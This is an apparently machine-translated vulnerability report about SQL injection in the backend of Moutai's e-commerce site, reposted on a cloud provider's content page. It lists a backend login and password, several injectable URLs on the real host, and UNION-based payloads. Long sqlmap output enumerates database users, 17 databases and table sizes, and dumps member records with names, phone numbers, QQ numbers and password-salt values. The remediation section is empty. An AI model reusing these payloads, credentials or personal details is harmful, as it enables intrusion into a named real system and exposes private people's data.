Moutai e-commerce has multiple SQL Injection packages in the background (DBA permission/17 databases/47W members)

Source: Internet
Author: User
Tags openid

Moutai e-commerce has multiple SQL Injection packages in the background (DBA permission/17 databases/47W members)

Note:

Http://www.emaotai.cn: 90/zyd/

Account: wanglei

Password 123456

Get submit method SQL injection point:


Http://www.emaotai.cn: 90/zyd/Sales/XsdEdit. aspx? Pjbh = 111000100020 & ReturnPage = Xsmxz. aspx & op = 2

http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18

Post submitted injection points (you can find them by entering single quotes in the search box ):


There are still many similar problems. Check the problem yourself.

http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650

Example

Payload: ReturnPage = Xsflz. aspx & spbh =-4455 'Union all select char (113) + CHAR (1

22)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:33:34] [INFO] fetching database users[09:33:35] [INFO] the SQL query used returns 12 entries[09:33:35] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##[09:33:35] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##[09:33:36] [INFO] retrieved: actuser[09:33:36] [INFO] retrieved: bmDev[09:33:36] [INFO] retrieved: dev[09:33:36] [INFO] retrieved: distributor_admin[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: moutaiwssc[09:33:38] [INFO] retrieved: mysys[09:33:38] [INFO] retrieved: sa[09:33:38] [INFO] retrieved: taxreaderdatabase management system users [11]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] actuser[*] bmDev[*] dev[*] distributor_admin[*] hishop_pj[*] moutaiwssc[*] mysys[*] sa[*] taxreader

 

Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:31:54] [INFO] testing Microsoft SQL Server[09:31:54] [INFO] confirming Microsoft SQL Server[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:31:55] [INFO] fetching database names[09:31:55] [INFO] the SQL query used returns 18 entries[09:31:56] [INFO] retrieved: distribution[09:31:56] [INFO] retrieved: DrpEco[09:31:56] [INFO] retrieved: drpecosdl[09:31:56] [INFO] retrieved: DrpEcoTest[09:31:57] [INFO] retrieved: eAct[09:31:57] [INFO] retrieved: eActTest[09:31:57] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_logs[09:31:58] [INFO] retrieved: hishop[09:31:59] [INFO] retrieved: master[09:31:59] [INFO] retrieved: model[09:31:59] [INFO] retrieved: moutai[09:31:59] [INFO] retrieved: moutaitest[09:32:00] [INFO] retrieved: msdb[09:32:00] [INFO] retrieved: ReportServer[09:32:00] [INFO] retrieved: ReportServerTempDB[09:32:01] [INFO] retrieved: tempdbavailable databases [17]:[*] distribution[*] DrpEco[*] drpecosdl[*] DrpEcoTest[*] eAct[*] eActTest[*] emaotai_act_test[*] emaotai_logs[*] hishop[*] master[*] model[*] moutai[*] moutaitest[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: hishop+------------------------------------+---------+| Table                              | Entries |+------------------------------------+---------+| dbo.Hishop_CouponItems             | 2473863 || dbo.vw_Hishop_CouponInfo           | 2473863 || dbo.aspnet_Members                 | 476302  || dbo.vw_aspnet_Members              | 476299  || dbo.Hishop_MessageContent          | 104862  || dbo.Hishop_MemberMessageBox        | 104674  || dbo.vw_Hishop_MemberMessageBox     | 104670  || dbo.aspnet_UsersInRoles            | 82703   || dbo.aspnet_UsersInRoles            | 82703   || dbo.Hishop_OrderItems              | 38235   || dbo.vw_Hishop_SaleDetails          | 38227   || dbo.vw_Hishop_OrderItem            | 20446   || dbo.Hishop_OrderOptions            | 18255   || dbo.Hishop_ManagerMessageBox       | 14698   || dbo.vw_Hishop_ManagerMessageBox    | 14695   || dbo.Hishop_PointDetails            | 14127   || dbo.xupiaoOrder                    | 12710   || dbo.Hishop_UserShippingAddresses   | 12014   || dbo.Hishop_Logs                    | 10193   || dbo.Hishop_OrderDebitNote          | 8515    || dbo.vw_Hishop_OrderDebitNote       | 8509    || dbo.Hishop_SMSLog                  | 7484    || dbo.Hishop_BookingOrderSend        | 4447    || dbo.Hishop_PhotoGallery            | 3791    || dbo.Hishop_Favorite                | 2395    || dbo.Hishop_ProductConsultations    | 1414    || dbo.vw_Hishop_ProductConsultations | 1414    || dbo.t_sys_Columdef                 | 1261    || dbo.Hishop_ProductReviews          | 1127    || dbo.vw_Hishop_ProductReviews       | 1127    || dbo.HiShop_PayMentDetail           | 656     || dbo.Hishop_PrivilegeInRoles        | 541     || dbo.Hishop_SKUMemberPrice          | 412     || dbo.Hishop_Products                | 375     || dbo.Hishop_SKUs                    | 375     || dbo.vw_Hishop_BrowseProductList    | 375     || dbo.vw_Hishop_ProductSkuList       | 375     || dbo.Hishop_OrderRefund             | 371     || dbo.vw_Hishop_OrderRefund          | 371     || dbo.Hishop_ProductTag              | 354     || dbo.Vshop_RelatedTopicProducts     | 202     || dbo.Hishop_InpourRequest           | 198     || dbo.t_sys_tabledef                 | 191     || dbo.Hishop_BalanceDetails          | 175     || dbo.Hishop_LeaveCommentReplys      | 131     || dbo.Hishop_LeaveComments           | 127     || dbo.t_cx_sql                       | 114     || dbo.Hishop_ShoppingCarts           | 88      || dbo.t_sys_StoreProc                | 87      || dbo.aspnet_Managers                | 80      || dbo.Vshop_HomeProducts             | 69      || dbo.vw_aspnet_Managers             | 69      || dbo.Hishop_Articles                | 65      || dbo.vw_Hishop_Articles             | 65      || dbo.Hishop_OrderReturns            | 56      || dbo.vw_Hishop_OrderReturns         | 56      || dbo.vshop_Reply                    | 47      || dbo.Hishop_PromotionMemberGrades   | 40      || dbo.Hishop_ProductTypeBrands       | 38      || dbo.Hishop_VoteItems               | 38      || dbo.tmp_orders                     | 38      || dbo.Vshop_Topics                   | 32      || dbo.Hishop_Affiche                 | 28      || dbo.Hishop_Categories              | 28      || dbo.Hishop_Hotkeywords             | 28      || dbo.Hishop_Helps                   | 26      || dbo.Hishop_OrderReplace            | 26      || dbo.vw_Hishop_Helps                | 26      || dbo.vw_Hishop_OrderReplace         | 26      || dbo.Hishop_PhotoCategories         | 23      || dbo.Hishop_BundlingProductItems    | 21      || dbo.Hishop_OrderSendNote           | 20      || dbo.Hishop_OrderSendNote           | 20      || dbo.vw_Hishop_OrderSendNote        | 20      || dbo.Hishop_CountDown               | 19      || dbo.vw_Hishop_CountDown            | 19      || dbo.vshop_Menu                     | 18      || dbo.Hishop_BrandCategories         | 17      || dbo.Hishop_CouponsLog              | 14      || dbo.Hishop_CouponsLog              | 14      || dbo.Hishop_MessageTemplates        | 13      || dbo.Hishop_Tags                    | 13      || dbo.Hishop_ExpressTemplates        | 11      || dbo.Hishop_RelatedProducts         | 11      || dbo.aspnet_Roles                   | 10      || dbo.Hishop_Promotions              | 10      || dbo.Hishop_BundlingProducts        | 9       || dbo.vshop_Message                  | 9       || dbo.Vshop_PrizeRecord              | 9       || dbo.vw_Hishop_BundlingProducts     | 9       || dbo.Hishop_Votes                   | 8       || dbo.Hishop_Banner                  | 7       || dbo.Hishop_ActivityProduct         | 6       || dbo.Hishop_AttributeValues         | 6       || dbo.Hishop_FriendlyLinks           | 6       || dbo.Hishop_HelpCategories          | 6       || dbo.vshop_ActivitySignUp           | 6       || dbo.Hishop_ActivityManage          | 5       || dbo.Hishop_ArticleCategories       | 5       || dbo.Hishop_ProductTypes            | 5       || dbo.aspnet_MemberGrades            | 4       || dbo.Hishop_PaymentTypes            | 4       || dbo.Hishop_TemplateRelatedShipping | 4       || dbo.Hishop_MemberClientSet         | 3       || dbo.Hishop_RelatedArticsProducts   | 3       || dbo.CustomMade_WebPoints           | 2       || dbo.Hishop_Attributes              | 2       || dbo.Hishop_OrderLookupItems        | 2       || dbo.Hishop_ShippingTypes           | 2       || dbo.Hishop_GroupBuyCondition       | 1       || dbo.Hishop_GroupBuyCondition       | 1       || dbo.Hishop_MessageWhiteList        | 1       || dbo.Hishop_OrderLookupLists        | 1       || dbo.Hishop_ProductBooking          | 1       || dbo.Hishop_Shippers                | 1       || dbo.Hishop_ShippingTemplates       | 1       || dbo.Hishop_TableLock               | 1       || dbo.t_sys_project                  | 1       || dbo.vw_Hishop_GroupBuy             | 1       |+------------------------------------+---------+



Aspnet_Members is a member table with 476302 data entries. Check the first two data entries.

Payload: ReturnPage = Xsflz. aspx & spbh =-4455 'Union all select char (113) + CHAR (1

22) + CHAR (118) + CHAR (120) + CHAR (113) + CHAR (66) + CHAR (108) + CHAR (78) + CHAR (99) + CHAR (104) + CHAR (87) + CHAR (106) + CHAR (74) + CHAR (76) + CHAR (83) + CHAR (113) + CHAR (98) + CHAR (107) + CHAR (118) + CHAR (113) ----- [09:55:19] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP. NET 4.0.30319, ASP. NETback-end DBMS: microsoft SQL Server 2008 [09:55:19] [INFO] fetching columns for table 'aspnet _ Members 'in database 'hishop' [09:55:19] [INFO] the SQL query used returns 31 entries [09:55:19] [INFO] fetching entries for table 'aspnet _ Members 'in database 'hishop' [09:55:19] [INFO] fetching number of distinct values for column 'qq' [09:55:19] [INFO] fetching number of distinct values for column 'msn '[09:55:19] [INFO] fetching number of distinct values for column 'openid' [09:55:19] [INFO] fetching number of distinct values for column 'points '[09:55:19] [INFO] fetching number of distinct values for column 'typeid' [09:55:19] [INFO] fetching number of distinct values for column 'address' [09:55:19] [INFO] fetching number of distinct values for column 'balance '[09:55:19] [INFO] fetching number of distinct values for column 'gradeid' [09:55:19] [INFO] fetching number of distinct values for column 'zipcode '[09:55:19] [INFO] fetching number of distinct values for column 'countbuy' [09:55:19] [INFO] fetching number of distinct values for column 'realname' [09:55:19] [INFO] fetching number of distinct values for column 'regionid' [09:55:19] [INFO] fetching number of distinct values for column 'telphone' [09:55:19] [INFO] fetching number of distinct values for column 'wangwang '[09:55:19] [INFO] fetching number of distinct values for column 'Cellphone' [09:55:19] [INFO] fetching number of distinct values for column 'sessionid' [09:55:19] [INFO] fetching number of distinct values for column 'userid _ drp' [09:55:19] [INFO] fetching number of distinct values for column 'Expenditure '[09:55:19] [INFO] fetching number of distinct values for column 'ordernumber' [09:55:19] [INFO] fetching number of distinct values for column 'topregionid' [09:55:19] [INFO] fetching number of distinct values for column 'vipcarddate' [09:55:19] [INFO] fetching number of distinct values for column 'isopenbalance '[09:55:19] [INFO] fetching number of distinct values for column 'vipcardnumber' [09:55:19] [INFO] fetching number of distinct values for column 'referraluserid' [09:55:19] [INFO] fetching number of distinct values for column 'requestbalance '[09:55:19] [INFO] fetching number of distinct values for column 'sessionendtime' [09:55:19] [INFO] fetching number of distinct values for column 'recordstatus _ drp' [09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordsalt' [09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordformat' [09:55:19] [WARNING] no proper character column provided (with unique values ). it won't be possible to retrieve all rows [09:55:20] [INFO] analyzing table dump for possible password hashesDatabase: hishopTable: aspnet_Members [2 entries] + -------- + --------- + ---------- + ----------- + upper + lower + upper + --------- + -------- + --------- + ---------- ---------- + ------------- + response + ----------- + response + | typeid | OpenId | GradeId | RegionId | SessionId | region | TopRegionId | referralid | QQ | MSN | Points | Zipcode | Address | Balance | Wangwang | CountBuy | RealName | TelPhone | CellPhone | VipCardDate | OrderNumber | Expenditure | VipCardNumber | IsOpenBalance | SessionEndTime | RequestBalance | Balance | | TradePasswordFormat | + -------- + --------- + ---------- + ----------- + upper + lower + upper + --------- + -------- + --------- + ---------- + ------------ + ------------- + hour + --------------- + ---------------- + ------------------ + hour + | 1 | NULL | 1 | 897 | NULL | 20141012000065 | 883 | NULL | 928095509 |  | 0 | NULL |  | 0.00 | NULL | Yang zhiguang | NULL | 13103529668 | 10 122014 PM | 0 | 0.00 | NULL | 1 | NULL | 0.00 | 3 | CRJAUboLeduKT + mKpKLZxg = | 1 | | 1 | NULL | 1 | 3139 | NULL | 20141022000012 | 3130 | NULL | 233629822 |  | 0 | NULL |  | 0.00 | NULL | luoping | NULL | 13980951791 | 10 22 2014 AM | 0 | 0.00 | NULL | 0 | NULL | 0.00 | 2 | f0uaf1ciax6tjpaljitwq = | 1 | + -------- + --------- + ---------- + ----------- + response + --------- + -------- + --------- + ---------- + ------------- + response + ------------- + --------------- + ---------------- + ------------------ + ---------------------------------- + ---------------------------    
Solution:

You are more professional than me.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.